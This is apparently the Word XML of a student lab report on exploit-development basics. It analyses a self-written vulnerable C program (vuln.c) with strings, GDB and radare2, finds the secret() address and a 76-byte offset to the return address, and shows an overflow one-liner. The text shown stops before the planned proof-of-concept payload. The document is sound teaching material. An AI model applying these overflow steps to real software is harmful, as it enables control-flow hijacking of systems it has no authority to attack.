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1A49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354D26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8B2959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1B3C60D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56DEC31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CDA825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474B99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1BD8E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F8BC4C0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2FEB941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46C4C2F3">
      <w:pPr>
        <w:bidi w:val="0"/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Exploit and Development basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AB549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645C8FE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53F5C1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9A87534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79B7313A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12BF8F5F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056AEF55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305AC362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8E72BE8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5361DE46">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9D8D62">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1FAB0B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Table of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E513E">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029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_Toc12228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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12228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08AB3E1C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_Toc1956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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1956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BDAB5FD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_Toc9435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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tasks:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9435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3B5E91D4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_Toc670 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binary Analysis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc670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C5DD067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_Toc7503 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer Overflow Discovery</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7503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6EA6063B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_Toc29886 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Radare2 Analysis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29886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53E10913">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc28059 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Proof-of-Concept Payload</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28059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0B990C9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_Toc25716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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Summary of Findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25716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175E25FB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_Toc32459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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32459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3EE763D">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc2445 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2445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0000016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fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF2995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TOC \t "Heading 4" \h \c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_Toc12102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vuln.c program</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12102 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>3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A4BE21D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_Toc12766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2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strings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12766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1876F51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_Toc19263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strings in gdb</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19263 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>4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34ACAC8E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_Toc592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Buffer overflow is confirmed</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc592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54EB39E2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_Toc24437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5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confirming offset</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24437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17128D07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_Toc23849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6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confirming registers</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23849 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5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29D7054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_Toc4113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7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radare2 results</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4113 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>6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4C3F4E15">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs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\l _Toc28927 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3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8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confirming POC</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28927 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000019">
      <w:pPr>
        <w:jc w:val="center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List of Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001A"/>
    <w:p w14:paraId="6BAC31E9">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">TOC \f F \t "Heading 5" \h \c</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc283 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows summary of findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc283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0000001F">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B4DFA"/>
    <w:p w14:paraId="2A619699"/>
    <w:p w14:paraId="7B163DB9"/>
    <w:p w14:paraId="447BE602"/>
    <w:p w14:paraId="31C20B87">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788B23EF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0" w:name="_Toc12228"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0155D288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Analyze a vulnerable C binary, discover buffer overflow vulnerability, and demonstrate a safe proof-of-concept (PoC) exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E3581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" w:name="_Toc1956"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47082513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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GDB, radare2, Python 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34462CA0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2" w:name="_Toc9435"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tasks:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="47633F72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Perform binary analysis using strings and GDB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B5EAF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Identify buffer overflow vulnerability and offset to saved return address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD7554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Craft a PoC payload to hijack control flow (redirect to secret() function).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241AA8BB"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/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observe program behavior (safe crash or execution of secret()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A26173E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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bookmarkStart w:id="3" w:name="_Toc670"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Binary Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2B6EE6A2">
      <w:pPr>
        <w:ind w:firstLine="7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1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a vulnerable c program name it as vuln.c and save it on desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675844DC">
      <w:pPr>
        <w:ind w:firstLine="7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Explanation of code : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24745EB8">
      <w:pPr>
        <w:ind w:firstLine="7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buf[64] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>→ local buffer that can be overflowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8918C8">
      <w:pPr>
        <w:ind w:firstLine="7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scanf("%s", buf) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>→ unsafe because it does not check input length, allowing overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EE017">
      <w:pPr>
        <w:ind w:firstLine="7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/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> → target function to redirect program flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABA511">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5106670" cy="2760980"/>
            <wp:effectExtent l="0" t="0" r="13970" b="12700"/>
            <wp:docPr id="10" name="Picture 10" descr="vulncp r ogr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vulncp r ogr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67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5B8ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/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</w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc1210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vuln.c program</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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7530A9AD">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE50189">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EB8442">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C66C05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD818BE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2 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inspect strings in binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745C4E0">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="7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strings vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DD5D0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573145" cy="2752090"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="2" name="Picture 2" descr="str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tring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314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0FCF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc12766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2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strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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2453D789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Step 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discover functions using GDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A23112">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="720" w:firstLine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gdb vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782714BD">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="7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info functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC45FFF">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="720" w:firstLine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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Address of secret() function:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs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 w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x8049186 &lt;secret&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DF9EFA">
      <w:pPr>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3353435" cy="3129915"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="13" name="Picture 13" descr="safe poc exploit start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afe poc exploit starts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3507">
      <w:pPr>
        <w:pStyle w:val="5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6" w:name="_Toc19263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strings in gdb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6775DB77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0BBE27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc7503"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer Overflow Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="1E747C1A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1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B8B26B">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="7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 w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python3 -c “print('A'*76)" | ./vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E64427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Observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45655D6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="168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Program prints input and then segmentation fault occurs when input exceeds 76 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC7883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="168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Confirms saved return address can be overwritten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C0D0B">
      <w:pPr>
        <w:numPr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2780" cy="699135"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1905"/>
            <wp:docPr id="14" name="Picture 14" descr="vuln confi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vuln confirm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69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F4A6">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc592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Buffer overflow is confirmed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7CECBC5C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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confirm offset to EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6909C564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Offset = 76 bytes to reach saved return address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F983B3F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This is confirmed by gradually increasing input length until crash occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E0D20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2780" cy="1440815"/>
            <wp:effectExtent l="0" t="0" r="12700" b="6985"/>
            <wp:docPr id="15" name="Picture 15" descr="gradual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dual check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0E41">
      <w:pPr>
        <w:pStyle w:val="5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9" w:name="_Toc24437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5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confirming offset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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016CD888"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61865" cy="2261235"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="trigger crash and check regist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rigger crash and check registers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8EBD">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0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0" w:name="_Toc23849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6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confirming registers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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7F63956E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A3CF47">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc29886"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Radare2 Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7FACC8D9">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/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Step 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CBDE6">
      <w:pPr>
        <w:ind w:left="1440" w:left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r2 vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C6CA7">
      <w:pPr>
        <w:ind w:left="1440" w:left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aaa      # Analyze all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D2A0A">
      <w:pPr>
        <w:ind w:left="1440" w:left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afl      # List functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE6073">
      <w:pPr>
        <w:ind w:left="1440" w:left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pdf     # print dis-assembly of main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B97880">
